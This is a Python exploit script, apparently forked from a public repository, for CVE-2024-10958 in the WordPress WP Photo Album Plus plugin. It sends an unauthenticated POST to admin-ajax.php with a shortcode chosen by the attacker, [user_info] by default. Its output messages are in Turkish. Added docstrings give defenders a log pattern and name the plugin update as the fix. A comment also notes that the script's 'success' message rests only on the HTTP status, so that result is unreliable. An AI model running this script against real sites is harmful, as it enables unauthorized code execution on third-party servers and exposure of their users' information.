forked from reinh3rz/CVE-2024-10958-WPPA-Exploit
exploit.py
#!/usr/bin/env python3
import requests
import argparse
import sys
# Text printed once at startup by main(); it names the plugin and the CVE
# identifier this script is written against.
banner = """
WordPress WP Photo Album Plus
Arbitrary Shortcode Execution
CVE-2024-10958
"""
def parse_args():
    """Read the command-line options for this script.

    Two options are declared: ``-u``/``--url`` (required) and
    ``-s``/``--shortcode`` (defaults to ``[user_info]``). Neither value is
    validated here; both are handed to the caller exactly as typed.

    Returns:
        The ``argparse.Namespace`` built from ``sys.argv``.
    """
    cli = argparse.ArgumentParser(description='WP Photo Album Plus Exploit')
    # Declared as data so each flag sits next to its settings.
    option_specs = (
        (('-u', '--url'),
         {'required': True, 'help': 'Hedef URL (örn: http://example.com)'}),
        (('-s', '--shortcode'),
         {'default': '[user_info]', 'help': 'Çalıştırılacak shortcode'}),
    )
    for flags, settings in option_specs:
        cli.add_argument(*flags, **settings)
    return cli.parse_args()
def exploit_wppa_shortcode(target_url, shortcode):
    """Send one POST carrying a shortcode to the site's admin-ajax endpoint.

    The request goes to ``<target_url>/wp-admin/admin-ajax.php`` with two form
    fields, ``action`` and ``shortcode``. No cookies, headers or credentials
    are attached by this function.

    For defenders: a POST to ``admin-ajax.php`` whose body carries this
    ``action`` value from a client without a session is the request shape to
    look for in web-server and WAF logs. The fix is to update the plugin to a
    release that addresses the CVE named in the banner.

    Args:
        target_url: Base URL of the site; used as given, with the endpoint
            path appended.
        shortcode: Shortcode text placed in the ``shortcode`` form field.

    Returns:
        True when the HTTP status is 200, False on any other status or when
        the request raises.
    """
    print(f"[*] Hedef: {target_url}")
    print(f"[*] Shortcode: {shortcode}")

    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
    form_fields = dict(
        action='getshortcodedrenderedfenodelay',
        shortcode=shortcode,
    )

    try:
        reply = requests.post(ajax_url, data=form_fields)
        # NOTE(review): the outcome is decided on the status code alone. The
        # body is printed but never inspected, so the "success" line does not
        # by itself show that the shortcode was rendered; do not read it as
        # proof that a host is unpatched (or patched).
        if reply.status_code != 200:
            print("[-] Exploit başarısız!")
            return False
        print("[+] Exploit başarılı!")
        print("[+] Yanıt:", reply.text)
        return True
    except Exception as err:
        # Any failure (connection, TLS, etc.) is reported and mapped to False.
        print(f"[-] Hata: {str(err)}")
        return False
def main():
    """Print the banner, read the CLI options, and issue the single request.

    The boolean returned by ``exploit_wppa_shortcode`` is discarded, so the
    process exit status does not reflect the outcome.
    """
    print(banner)
    options = parse_args()
    exploit_wppa_shortcode(target_url=options.url, shortcode=options.shortcode)


# Run only when executed as a script, not when imported.
if __name__ == '__main__':
    main()